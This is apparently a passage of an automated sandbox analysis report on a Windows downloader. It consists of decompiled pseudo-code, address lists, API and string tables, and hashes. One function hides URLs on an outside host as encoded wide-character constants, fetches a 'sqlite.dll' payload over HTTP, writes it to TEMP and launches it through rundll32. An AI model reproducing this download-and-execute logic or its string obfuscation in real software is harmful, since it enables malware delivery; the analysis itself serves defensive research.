							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}

0x00404903
0x0040490c
0x00404917
0x0040491a
0x0040491d
0x0040492f
0x00404935
0x00404938
0x0040493b
0x0040493f
0x00404943
0x00404946
0x00404aab
0x00404ab1
0x00404ab4
0x00404ab7
0x00404aba
0x00404abd
0x00404ac4
0x00404aca
0x00404acb
0x00404ace
0x00404ad1
0x00404ad5
0x00404ad5
0x00404ad6
0x00404ada
0x00404ae6
0x00404ae7
0x00404aea
0x00404aee
0x00404aee
0x00404af2
0x00404af5
0x00404af7
0x00404afa
0x00404b1a
0x00404b24
0x00404b24
0x00404b28
0x00404b2a
0x00404b31
0x00404b31
0x00404b33
0x00404b35
0x00404b38
0x00404b38
0x00404b38
0x00404b38
0x00404afc
0x00404b05
0x00404b09
0x00404b0b
0x00404b0f
0x00404b0f
0x00404b11
0x00404b16
0x00404b16
0x00404b11
0x00404b3b
0x00404b3b
0x00404b44
0x00404b4d
0x00404b53
0x00404b56
0x00404b5c
0x00404b5d
0x00404b60
0x00404b64
0x00404b64
0x00404b60
0x00404b65
0x00404b6c
0x00404b6f
0x00404b72
0x00404b75
0x00404b7b
0x00404b81
0x00404b84
0x00404b86
0x00404b8a
0x00404b8d
0x00404b90
0x00404b90
0x00404b92
0x00404b96
0x00404bb9
0x00404bbd
0x00404bc9
0x00404bcc
0x00404bcc
0x00404bcc
0x00404bcc
0x00404bcf
0x00404bd6
0x00404bd9
0x00404b98
0x00404b98
0x00404b9c
0x00404ba7
0x00404baa
0x00404baa
0x00404baa
0x00404bac
0x00404bb0
0x00404bb5
0x00404bb5
0x00404be0
0x00404be0
0x00404be0
0x00404be2
0x00404be5
0x00404be7
0x00404be7
0x00404beb
0x00404bed
0x00000000
0x00404bed
0x0040494f
0x00000000
0x0040495f
0x00404965
0x00404969
0x0040496c
0x00404970
0x00404971
0x00404971
0x0040497a
0x0040497f
0x004049ad
0x004049b1
0x004049b3
0x004049ba
0x004049ba
0x004049bc
0x004049be
0x004049c1
0x004049c1
0x004049c1
0x004049c1
0x00404981
0x0040498b
0x0040498f
0x00404991
0x00404995
0x00404997
0x0040499c
0x0040499c
0x00404997
0x0040497f
0x004049ca
0x004049d3
0x004049db
0x004049e2
0x00404a92
0x004049e8
0x004049f1
0x004049f2
0x004049f9
0x004049fd
0x004049fd
0x00404a01
0x00404a04
0x00404a0a
0x00404a0d
0x00404a10
0x00404a13
0x00404a19
0x00404a22
0x00404a24
0x00404a2b
0x00404a2e
0x00404a30
0x00404a34
0x00404a57
0x00404a5b
0x00404a5d
0x00404a67
0x00404a6a
0x00404a6a
0x00404a6a
0x00404a6a
0x00404a6d
0x00404a74
0x00404a74
0x00404a77
0x00404a36
0x00404a3a
0x00404a48
0x00404a48
0x00404a4a
0x00404a4e
0x00404a53
0x00404a53
0x00404a7e
0x00404a7e
0x00404a80
0x00404a83
0x00404a86
0x00404a8a
0x00404a8c
0x00404a8c
0x00404a95
0x00404a98
0x00404a9b
0x00000000
0x00404a9b

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: b2976a17d927e90fa47989bfd6768a3b0b5e15d1acc986474e29f7dfe6bf9e28
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: F6B17DB5A002069FDB15CF14C5D0AA9BBA1FB88314F14C1AED91A5B382C735FA42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401FD0, Relevance: 75.3, APIs: 3, Strings: 40, Instructions: 99
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00401FD0() {
				short _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				short _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				short _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				short _v700;
				short _v704;
				intOrPtr _v708;
				short _v712;
				short _t57;
				void* _t64;
				void* _t65;
				intOrPtr _t68;
				short _t72;
				short* _t78;

				_t78 =  &_v712;
				goto L1;
				do {
					do {
						L1:
						_t57 = L"2201"; // 0x320032
						_t68 =  *0x40a0d4; // 0x310030
						_t72 =  *0x40a0d8; // 0x0
						_v712 = _t57;
						_v708 = _t68;
						_v676 = 0x740068;
						_v672 = 0x700074;
						_v668 = 0x3a0073;
						_v664 = 0x2f002f;
						_v660 = 0x2e0061;
						_v656 = 0x6f0067;
						_v652 = 0x740061;
						_v648 = 0x610067;
						_v644 = 0x65006d;
						_v640 = 0x63002e;
						_v636 = 0x2f006f;
						_v632 = 0x730075;
						_v628 = 0x720065;
						_v624 = 0x2f0066;
						_v620 = 0x610064;
						_v616 = 0x2f0074;
						_v612 = 0;
						_v704 = _t72;
						_v700 = 0x73002f;
						_v696 = 0x6c0071;
						_v692 = 0x740069;
						_v688 = 0x2e0065;
						_v684 = 0x610064;
						_v680 = 0x74;
						lstrcatW( &_v520,  &_v676);
						lstrcatW( &_v520,  &_v712);
						lstrcatW( &_v520,  &_v700);
						_t64 = E00401980( &_v520, 1);
						_t78 =  &(_t78[4]);
					} while (_t64 == 0);
					_v608 = 0x740068;
					_v604 = 0x700074;
					_v600 = 0x3a0073;
					_v596 = 0x2f002f;
					_v592 = 0x2e0061;
					_v588 = 0x6f0067;
					_v584 = 0x740061;
					_v580 = 0x610067;
					_v576 = 0x65006d;
					_v572 = 0x63002e;
					_v568 = 0x2f006f;
					_v564 = 0x730075;
					_v560 = 0x720065;
					_v556 = 0x2f0066;
					_v552 = 0x610064;
					_v548 = 0x2f0074;
					_v544 = 0x710073;
					_v540 = 0x69006c;
					_v536 = 0x650074;
					_v532 = 0x64002e;
					_v528 = 0x6c006c;
					_v524 = 0;
					_t65 = E00401980( &_v608, 2);
					_t78 =  &(_t78[4]);
				} while (_t65 == 0);
				_push(0x40cb38);
				_push(L"rundll32.exe");
				return E00401050();
			}

0x00401fd0
0x00401fea
0x00401fec
0x00401fec
0x00401fec
0x00401fec
0x00401ff1
0x00401ff7
0x00401ffe
0x00402002
0x00402013
0x0040201b
0x00402023
0x0040202b
0x00402033
0x0040203b
0x00402043
0x0040204b
0x00402053
0x0040205b
0x00402063
0x0040206b
0x00402073
0x0040207b
0x00402083
0x00402087
0x0040208b
0x0040208f
0x00402094
0x0040209c
0x004020a4
0x004020ac
0x004020b4
0x004020b8
0x004020c0
0x004020cf
0x004020de
0x004020ea
0x004020ef
0x004020f2
0x00402101
0x0040210c
0x00402117
0x00402122
0x0040212d
0x00402138
0x00402143
0x0040214e
0x00402159
0x00402164
0x0040216f
0x0040217a
0x00402185
0x00402190
0x0040219b
0x004021a2
0x004021a9
0x004021b4
0x004021bf
0x004021ca
0x004021d5
0x004021e0
0x004021e7
0x004021ec
0x004021ef
0x004021f7
0x004021fc
0x00402213

APIs

lstrcatW.KERNEL32 ref: 004020C0
lstrcatW.KERNEL32(?,?), ref: 004020CF
lstrcatW.KERNEL32(?,?), ref: 004020DE

Part of subcall function 00401980: LoadLibraryA.KERNEL32(ole32,CoCreateInstance,00610064,74B482B0), ref: 004019B7
Part of subcall function 00401980: GetProcAddress.KERNEL32(00000000), ref: 004019BE
Part of subcall function 00401980: SysAllocString.OLEAUT32(?), ref: 00401A47

Strings

g, xrefs: 00402138
a, xrefs: 00402043
q, xrefs: 0040209C
h, xrefs: 00402101
/, xrefs: 00402122
a, xrefs: 00402033
t, xrefs: 004020B8
u, xrefs: 0040206B
s, xrefs: 00402117
s, xrefs: 004021A9
e, xrefs: 00402073
a, xrefs: 0040212D
g, xrefs: 0040214E
h, xrefs: 00402013
o, xrefs: 0040216F
s, xrefs: 00402023
t, xrefs: 0040210C
., xrefs: 0040205B
/, xrefs: 0040202B
m, xrefs: 00402053
i, xrefs: 004020A4
e, xrefs: 00402185
/, xrefs: 00402094
f, xrefs: 00402190
g, xrefs: 0040203B
a, xrefs: 00402143
o, xrefs: 00402063
l, xrefs: 004021B4
t, xrefs: 004021BF
f, xrefs: 0040207B
u, xrefs: 0040217A
2201, xrefs: 00401FEC
l, xrefs: 004021D5
rundll32.exe, xrefs: 004021FC
t, xrefs: 0040201B
g, xrefs: 0040204B
e, xrefs: 004020AC
m, xrefs: 00402159
., xrefs: 00402164
., xrefs: 004021CA

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$AddressAllocLibraryLoadProcString
String ID: .$.$.$/$/$/$2201$a$a$a$a$e$e$e$f$f$g$g$g$g$h$h$i$l$l$m$m$o$o$q$rundll32.exe$s$s$s$t$t$t$t$u$u
API String ID: 2515409318-1635122530
Opcode ID: 7687587f2051bf6d2f81632e80ee195d51b282718d81f1c4b7ed6132ce742689
Instruction ID: cead2cc699d2fd651ee67a500440943cc5912a6a01640668e28bc9ea129ba5a6
Opcode Fuzzy Hash: 7687587f2051bf6d2f81632e80ee195d51b282718d81f1c4b7ed6132ce742689
Instruction Fuzzy Hash: BA51E9B4508384CBE320CF51D548BABFBE6BB85B48F00492DE68856251D7F6818CCF67

Uniqueness

Uniqueness Score: -1.00%

Function 00401980, Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
libraryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401980(intOrPtr _a4, intOrPtr _a8) {
				long _v28;
				signed int _v36;
				char _v56;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v120;
				signed int _v132;
				intOrPtr* _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				long _v616;
				intOrPtr _v636;
				void* _v640;
				intOrPtr* _v644;
				char _v645;
				char _v646;
				char _v647;
				char _v648;
				struct _OVERLAPPED* _v652;
				struct _OVERLAPPED* _v656;
				intOrPtr* _v660;
				short _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				char _v676;
				struct _OVERLAPPED* _v680;
				intOrPtr _v684;
				char _v688;
				short _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				long _v704;
				intOrPtr* _v708;
				char _v712;
				intOrPtr _v716;
				char _v724;
				char _v728;
				long _v740;
				void* _v744;
				intOrPtr _v756;
				intOrPtr _v760;
				_Unknown_base(*)()* _t107;
				intOrPtr _t110;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr* _t121;
				int _t124;
				intOrPtr* _t130;
				intOrPtr _t149;
				intOrPtr _t156;
				intOrPtr _t159;
				intOrPtr _t174;
				intOrPtr _t175;
				intOrPtr* _t176;
				intOrPtr _t179;
				intOrPtr _t195;
				void* _t200;
				intOrPtr* _t201;
				intOrPtr* _t206;
				intOrPtr* _t207;
				intOrPtr _t208;
				WCHAR* _t212;
				void* _t213;
				signed int _t215;
				signed int _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				intOrPtr* _t220;

				_t216 = _t215 & 0xfffffff8;
				_push(0xffffffff);
				_push(E00407BAD);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t216;
				_t217 = _t216 - 0x274;
				_v616 = 0;
				_v640 = 0;
				_t107 = GetProcAddress(LoadLibraryA("ole32"), "CoCreateInstance");
				_push( &_v640);
				_push(0x40a080);
				_push(0x17);
				_push(0);
				_push(0x40a070);
				if( *_t107() < 0) {
					L45:
					 *[fs:0x0] = _v36;
					return _v636;
				} else {
					_t174 =  *0x40d2b8; // 0x0
					_t110 =  *0x40d2bc; // 0x0
					_t156 =  *0x40d2c0; // 0x80020004
					_v616 = _t174;
					_t175 =  *0x40d2c4; // 0x0
					_v648 = 0x47;
					_v647 = 0x45;
					_v646 = 0x54;
					_v645 = 0;
					_v612 = _t110;
					_v608 = _t156;
					_v604 = _t175;
					_t206 = E0040226B(0xc);
					_t218 = _t217 + 4;
					_v640 = _t206;
					_t195 = _a4;
					_v28 = 0;
					if(_t206 == 0) {
						_t206 = 0;
					} else {
						 *((intOrPtr*)(_t206 + 4)) = 0;
						 *(_t206 + 8) = 1;
						__imp__#2(_t195);
						 *_t206 = 0;
						if(0 == 0 && _t195 != 0) {
							E00407643(0x8007000e);
						}
					}
					_v644 = _t206;
					_v28 = 0xffffffff;
					_v640 = _t206;
					if(_t206 == 0) {
						E00407643(0x8007000e);
					}
					_v28 = 1;
					if(_t206 == 0) {
						_v656 = 0;
					} else {
						_v656 =  *_t206;
					}
					_t207 = E0040226B(0xc);
					_t219 = _t218 + 4;
					_v652 = _t207;
					_v28 = 2;
					if(_t207 == 0) {
						_t207 = 0;
					} else {
						 *(_t207 + 4) = 0;
						 *(_t207 + 8) = 1;
						_t149 = E004076F0( &_v648,  &_v648);
						 *_t207 = _t149;
						if(_t149 == 0) {
							E00407643(0x8007000e);
						}
					}
					_v28 = 1;
					_v600 = _t207;
					if(_t207 == 0) {
						E00407643(0x8007000e);
					}
					_v28 = 3;
					if(_t207 == 0) {
						_v652 = 0;
					} else {
						_v652 =  *_t207;
					}
					_t220 = _t219 - 0x10;
					_t176 = _t220;
					_t114 = _v660;
					 *_t176 = _v616;
					 *((intOrPtr*)(_t176 + 4)) = _v612;
					 *((intOrPtr*)(_t176 + 8)) = _v608;
					 *((intOrPtr*)(_t176 + 0xc)) = _v604;
					_t200 =  *((intOrPtr*)( *_t114 + 0x24))(_t114, _v652, _v656);
					_v56 = 1;
					if(_t207 != 0) {
						_t45 = _t207 + 8; // 0x8
						if(InterlockedDecrement(_t45) == 0) {
							E00401E20(_t207);
							E00402260(_t207);
							_t220 = _t220 + 4;
						}
					}
					_t208 = _v672;
					_v56 = 0xffffffff;
					if(_t208 != 0 && InterlockedDecrement(_t208 + 8) == 0) {
						E00401E20(_t208);
						E00402260(_t208);
						_t220 = _t220 + 4;
					}
					if(_t200 < 0) {
						L44:
						_t116 = _v688;
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						goto L45;
					} else {
						_t118 =  *0x40d2b8; // 0x0
						_t159 =  *0x40d2bc; // 0x0
						_t179 =  *0x40d2c0; // 0x80020004
						_t201 = _t220 - 0x10;
						 *_t201 = _t118;
						_t119 =  *0x40d2c4; // 0x0
						 *((intOrPtr*)(_t201 + 4)) = _t159;
						 *((intOrPtr*)(_t201 + 8)) = _t179;
						_push(_v688);
						 *((intOrPtr*)(_t201 + 0xc)) = _t119;
						if( *((intOrPtr*)( *_v688 + 0x34))() < 0) {
							goto L44;
						} else {
							_t121 = _v708;
							 *((intOrPtr*)( *_t121 + 0x38))(_t121,  &_v692);
							if(_v700 != 0xc8) {
								goto L44;
							} else {
								_t124 = E00401E70(_v716,  &_v688);
								_v88 = 4;
								if(_v692 != 0x2011) {
									L42:
									_v84 = 0xffffffff;
									__imp__#9( &_v688);
									if(_t124 < 0) {
										E00407643(_t124);
									}
									goto L44;
								} else {
									__imp__#17(_v680);
									if(_t124 != 1) {
										goto L42;
									} else {
										__imp__#20(_v684, _t124,  &_v712);
										__imp__#19(_v696, 1,  &_v728);
										_v740 = _v740 + 1;
										__imp__#23(_v708,  &_v724);
										_t212 = E0040264E(_a4, 0x2f) + 2;
										_v688 = 0x450054;
										_v684 = 0x50004d;
										_v680 = 0;
										_v676 = 0x45746547;
										_v672 = 0x7269766e;
										_v668 = 0x656d6e6f;
										_v664 = 0x6156746e;
										_v660 = 0x62616972;
										_v656 = 0x57656c;
										_t130 = E00401000( &_v676);
										if(_t130 != 0) {
											_push(0x104);
											_push( &_v652);
											_push( &_v688);
											if( *_t130() != 0) {
												lstrcatW( &_v664, "\\");
												lstrcatW( &_v664, _t212);
												_t212 =  &_v664;
											}
											if(_a8 == 2) {
												wsprintfW(0x40cb38, L"\"%s\",global", _t212);
											}
											_t124 = CreateFileW(_t212, 0x40000000, 0, 0, 2, 0x80, 0);
											_t213 = _t124;
											if(_t213 != 0xffffffff) {
												WriteFile(_t213, _v744, _v760 - _v756,  &_v704, 0);
												_v740 = 1;
												_t124 = CloseHandle(_t213);
											}
											__imp__#24(_v728);
											goto L42;
										} else {
											_v120 = 0xffffffff;
											__imp__#9( &_v724);
											if(_t130 < 0) {
												E00407643(_t130);
											}
											 *[fs:0x0] = _v132;
											return 0;
										}
									}
								}
							}
						}
					}
				}
			}

0x00401983
0x00401986
0x00401988
0x00401993
0x00401994
0x0040199b
0x004019af
0x004019b3
0x004019be
0x004019c8
0x004019c9
0x004019ce
0x004019d0
0x004019d2
0x004019db
0x00401df9
0x00401e05
0x00401e10
0x004019e1
0x004019e1
0x004019e7
0x004019ec
0x004019f2
0x004019f6
0x004019fe
0x00401a03
0x00401a08
0x00401a0d
0x00401a12
0x00401a16
0x00401a1a
0x00401a23
0x00401a25
0x00401a28
0x00401a2c
0x00401a33
0x00401a3a
0x00401a63
0x00401a3c
0x00401a3d
0x00401a40
0x00401a47
0x00401a4f
0x00401a51
0x00401a5c
0x00401a5c
0x00401a51
0x00401a67
0x00401a6b
0x00401a76
0x00401a7a
0x00401a81
0x00401a81
0x00401a88
0x00401a93
0x00401a9d
0x00401a95
0x00401a97
0x00401a97
0x00401aac
0x00401aae
0x00401ab1
0x00401ab7
0x00401abf
0x00401aeb
0x00401ac1
0x00401ac5
0x00401acd
0x00401ad4
0x00401adb
0x00401add
0x00401ae4
0x00401ae4
0x00401add
0x00401aef
0x00401af7
0x00401afb
0x00401b02
0x00401b02
0x00401b09
0x00401b11
0x00401b1b
0x00401b13
0x00401b15
0x00401b15
0x00401b27
0x00401b2a
0x00401b2c
0x00401b30
0x00401b38
0x00401b3f
0x00401b46
0x00401b59
0x00401b5b
0x00401b63
0x00401b65
0x00401b71
0x00401b75
0x00401b7b
0x00401b80
0x00401b80
0x00401b71
0x00401b83
0x00401b87
0x00401b94
0x00401ba6
0x00401bac
0x00401bb1
0x00401bb1
0x00401bb6
0x00401def
0x00401def
0x00401df6
0x00000000
0x00401bbc
0x00401bbc
0x00401bc1
0x00401bca
0x00401bd4
0x00401bd8
0x00401bda
0x00401bdf
0x00401be2
0x00401be9
0x00401bea
0x00401bf2
0x00000000
0x00401bf8
0x00401bf8
0x00401c04
0x00401c0f
0x00000000
0x00401c15
0x00401c1e
0x00401c2a
0x00401c35
0x00401dcf
0x00401dd3
0x00401ddf
0x00401de7
0x00401dea
0x00401dea
0x00000000
0x00401c3b
0x00401c40
0x00401c49
0x00000000
0x00401c4f
0x00401c5a
0x00401c6c
0x00401c81
0x00401c85
0x00401c9d
0x00401ca0
0x00401ca8
0x00401cb0
0x00401cb8
0x00401cc0
0x00401cc8
0x00401cd0
0x00401cd8
0x00401ce0
0x00401ce8
0x00401cf2
0x00401d2e
0x00401d37
0x00401d38
0x00401d3d
0x00401d4f
0x00401d57
0x00401d59
0x00401d59
0x00401d61
0x00401d6e
0x00401d74
0x00401d8a
0x00401d90
0x00401d95
0x00401daf
0x00401db6
0x00401dbe
0x00401dbe
0x00401dc9
0x00000000
0x00401cf4
0x00401cf8
0x00401d04
0x00401d0c
0x00401d0f
0x00401d0f
0x00401d1d
0x00401d29
0x00401d29
0x00401cf2
0x00401c49
0x00401c35
0x00401c0f
0x00401bf2
0x00401bb6

APIs

LoadLibraryA.KERNEL32(ole32,CoCreateInstance,00610064,74B482B0), ref: 004019B7
GetProcAddress.KERNEL32(00000000), ref: 004019BE
SysAllocString.OLEAUT32(?), ref: 00401A47
InterlockedDecrement.KERNEL32(00000008), ref: 00401B69
InterlockedDecrement.KERNEL32(?), ref: 00401B9A
SafeArrayGetDim.OLEAUT32(?), ref: 00401C40
SafeArrayGetLBound.OLEAUT32(?,00000000,?), ref: 00401C5A
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00401C6C
SafeArrayAccessData.OLEAUT32(?,?), ref: 00401C85
VariantClear.OLEAUT32(?), ref: 00401D04
lstrcatW.KERNEL32(?,0040A06C), ref: 00401D4F
lstrcatW.KERNEL32(?,-00000002), ref: 00401D57
wsprintfW.USER32 ref: 00401D6E
CreateFileW.KERNEL32(-00000002,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401D8A
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00401DAF
CloseHandle.KERNEL32 ref: 00401DBE
SafeArrayUnaccessData.OLEAUT32(?), ref: 00401DC9
VariantClear.OLEAUT32(00002011), ref: 00401DDF

Strings

riab, xrefs: 00401CD8
T, xrefs: 00401A08
M, xrefs: 00401CA8
ole32, xrefs: 004019AA
G, xrefs: 004019FE
E, xrefs: 00401A03
T, xrefs: 00401CA0
CoCreateInstance, xrefs: 004019A5
leW, xrefs: 00401CE0
"%s",global, xrefs: 00401D64
nvir, xrefs: 00401CC0
ntVa, xrefs: 00401CD0
onme, xrefs: 00401CC8
GetE, xrefs: 00401CB8

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundClearDataDecrementFileInterlockedVariantlstrcat$AccessAddressAllocCloseCreateHandleLibraryLoadProcStringUnaccessWritewsprintf
String ID: "%s",global$CoCreateInstance$E$G$GetE$M$T$T$leW$ntVa$nvir$ole32$onme$riab
API String ID: 895335699-2275290888
Opcode ID: 19ffded4161e043d986e6dcab8799c103509e0549850050e4faa73cf55c88a90
Instruction ID: ac053f2692a97b7bafe74dc037154a54974eb04e986a250229ef295045637207
Opcode Fuzzy Hash: 19ffded4161e043d986e6dcab8799c103509e0549850050e4faa73cf55c88a90
Instruction Fuzzy Hash: 04D1A2715087419FC320DF64C948B5BBBE4BF88714F108A2EF595A73A0D778E905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406977, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00406977(int _a4, int _a8, signed char _a9, char* _a12, char _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				char _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x408588);
				_push(E00403E48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x40d168; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t3 =  &_a16; // 0x406d69
						_t83 = E00406B9B(_a12,  *_t3);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x40d168; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x40d160; // 0x0
								_a28 = _t82;
							}
							_t14 =  &_a16; // 0x406d69
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12,  *_t14, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E004065A0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0) {
									goto L21;
								} else {
									_t27 =  &_a16; // 0x406d69
									if(MultiByteToWideChar(_a28, 1, _a12,  *_t27, _v40, _t88) == 0) {
										goto L21;
									} else {
										_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
										_v44 = _t99;
										if(_t99 == 0) {
											goto L21;
										} else {
											if((_a9 & 0x00000004) == 0) {
												_v8 = 1;
												E004065A0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
												_v28 = _t102;
												_t89 = _t102;
												_v36 = _t89;
												_v8 = _v8 | 0xffffffff;
												if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
													goto L21;
												} else {
													_push(0);
													_push(0);
													if(_a24 != 0) {
														_push(_a24);
														_push(_a20);
													} else {
														_push(0);
														_push(0);
													}
													_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
													if(_t99 == 0) {
														goto L21;
													} else {
														goto L30;
													}
												}
											} else {
												if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
													L30:
													_t62 = _t99;
												} else {
													goto L21;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t8 =  &_a16; // 0x406d69
						_t62 = LCMapStringA(_a4, _a8, _a12,  *_t8, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x408580, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x40857c, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x40d168 = 2;
							goto L5;
						}
					} else {
						 *0x40d168 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x0040697a
0x0040697c
0x00406981
0x0040698c
0x0040698d
0x00406994
0x0040699a
0x0040699f
0x004069a5
0x004069ed
0x004069f0
0x004069f2
0x004069f8
0x004069fe
0x004069ff
0x004069ff
0x00406a02
0x00406a0a
0x00406a2c
0x00000000
0x00406a32
0x00406a35
0x00406a37
